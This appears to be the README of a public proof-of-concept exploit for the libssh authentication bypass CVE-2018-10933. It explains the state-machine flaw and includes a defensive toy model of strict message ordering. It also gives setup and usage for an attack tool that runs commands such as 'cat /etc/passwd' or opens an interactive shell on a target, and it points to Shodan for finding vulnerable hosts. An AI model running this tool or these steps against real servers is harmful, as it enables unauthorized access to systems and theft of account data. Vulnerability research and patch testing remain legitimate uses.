CVE-2018-10933 PoC — libssh server-side state machine security vulnerability

Related vulnerability
Title: libssh server-side state machine security vulnerability (CVE-2018-10933)
Description: libssh is a C development library for accessing SSH services; it can execute remote commands and transfer files, and it provides a secure transport channel for remote programs. The server-side state machine is the library's server-side state-machine component. A security vulnerability exists in libssh's server-side state machine in versions before 0.7.6 and before 0.8.4. An attacker can exploit it through a malicious client to create channels without performing authentication, thereby gaining unauthorized access.
Description: libSSH-Authentication-Bypass
Introduction

# CVE-2018-10933
![](https://www.bastify.com/wp-content/uploads/2019/02/ssh-tunneling.png)

***
A vulnerability was found in libssh's server-side state machine before versions 0.7.6 and 0.8.4.
A malicious client could create channels without first performing authentication, resulting in unauthorized access.

## SOME DETAILS
The issue stems from libssh not tracking the state of authentication, which allows the authentication step to be bypassed. Think of the connection as a multi-step process: step 1, step 2, step 3... Since libssh does not enforce the order of those steps, a client can jump straight to step 3 without ever going through steps 1 and 2.

Interestingly, the same issue was found in the SSH library Paramiko earlier: CVE-2018-7750.
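To make the ordering problem concrete, here is an added toy model written for this page (not code from libssh, from Paramiko, or from this repository). It contrasts a dispatcher that runs handlers regardless of session state with one that checks every message against an explicit state machine and only advances to the authenticated state when the server itself verifies credentials. The message names, the two states and the password check are simplified assumptions, not libssh's real API:

```python
"""Toy model of a server-side SSH message dispatcher.

Added example, not libssh code. Message names, states and the
credential check are simplified assumptions used only to illustrate
why the server must enforce the order of protocol steps.
"""
from enum import Enum, auto


class State(Enum):
    """Coarse session phases (assumption: a two-state simplification)."""
    KEX_DONE = auto()       # key exchange finished, nobody authenticated yet
    AUTHENTICATED = auto()  # the server itself verified the client's credentials


# Which messages the server may act on in which state (constructed table).
ALLOWED_IN = {
    "service_request": {State.KEX_DONE},
    "userauth_request": {State.KEX_DONE},
    "channel_open": {State.AUTHENTICATED},
    "channel_request": {State.AUTHENTICATED},
}


class LaxServer:
    """Models the flawed behaviour: handlers run no matter what step the
    session is at, so a client can 'jump to step 3' and open a channel
    without any authentication having happened."""

    def __init__(self):
        self.channels = []

    def handle(self, msg, **kw):
        if msg == "channel_open":
            self.channels.append(len(self.channels))
        return True


class StrictServer:
    """Hardened dispatcher: every message is checked against the current
    state, and the state only advances on a server-side credential check,
    never on anything the client merely claims."""

    def __init__(self, valid_password):
        self.state = State.KEX_DONE
        self.channels = []
        self.rejected = []  # (message, state, reason): useful audit trail
        self._valid_password = valid_password

    def handle(self, msg, **kw):
        if msg not in ALLOWED_IN:
            self.rejected.append((msg, self.state.name, "unknown message"))
            return False
        if self.state not in ALLOWED_IN[msg]:
            self.rejected.append((msg, self.state.name, "not allowed in this state"))
            return False
        if msg == "userauth_request":
            ok = kw.get("password") == self._valid_password
            if ok:
                self.state = State.AUTHENTICATED
            return ok
        if msg == "channel_open":
            self.channels.append(len(self.channels))
        return True


def drive(server, messages):
    """Feed a client's message sequence to a server; return channels opened."""
    for name, args in messages:
        server.handle(name, **args)
    return len(server.channels)


# Constructed client sequences for the example.
OUT_OF_ORDER = [("service_request", {}), ("channel_open", {})]
HONEST = [
    ("service_request", {}),
    ("userauth_request", {"password": "hunter2"}),
    ("channel_open", {}),
]

if __name__ == "__main__":
    print("lax server, out-of-order client:", drive(LaxServer(), OUT_OF_ORDER))
    strict = StrictServer(valid_password="hunter2")
    print("strict server, out-of-order client:", drive(strict, OUT_OF_ORDER))
    print("rejections logged:", strict.rejected)
    print("strict server, honest client:", drive(StrictServer("hunter2"), HONEST))
```

The `rejected` list is the detection hook: a real server should log a message that arrives in a state where it is not permitted, because a legitimate client never produces that sequence.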

## Documentation
Exploit-DB : https://www.exploit-db.com/exploits/45638

Information about CVE-2018-10933 by libSSH : https://www.libssh.org/security/advisories/CVE-2018-10933.txt

Bugfix Release by libSSH : https://www.libssh.org/2018/10/16/libssh-0-8-4-and-0-7-6-security-and-bugfix-release/

## Setup

```
sudo apt-get install python3

gh repo clone EmmanuelCruzL/CVE-2018-10933
cd CVE-2018-10933

pip3 install -r requirements.txt

python3 main.py -h
```
## Usage
```
usage: main.py [-h] [-p PORT] [-log] [-t | -c COMMAND | -i] host

Script for the vulnerabilities CVE-2018-10933

positional arguments:
  host                  the ip or domain address of ssh server

options:
  -h, --help            show this help message and exit
  -p PORT, --port PORT  The port the service ssh, default [22]
  -log, --logfile       Logfile to write conn logs
  -t, --test            check the version of libSSH
  -c COMMAND, --command COMMAND
                        command to execute
  -i, --interactive     open the interactive mode
   
```

## EXAMPLES POC

### EXAMPLE (check if the host is vulnerable)
```
python3 main.py 0.0.0.0 -p 22 -t
```
![](https://imgr.co/cache/img/2b54583d34c2d1406025927166ad6d1f.jpg)

### EXAMPLE (send command via argument)
```
python3 main.py 0.0.0.0 -p 22 -c "cat /etc/passwd"
```
![](https://i.imgur.com/mGCfyt4.png)

### EXAMPLE (using the simple interactive console)
```
python3 main.py 0.0.0.0 -p 22 -i
```
![](https://i.imgur.com/F2f3ral.png)


## Shodan.io libSSH
```diff
[!] vulnerable devices can be found using shodan.io
-  ( port 22 is the default; other ports such as 2222, 3333 and 4444 might also be running libSSH )
```

![](https://i.imgur.com/MBUWEg4.png)


## Authors

- [Rubickcuv](https://github.com/EmmanuelCruzL)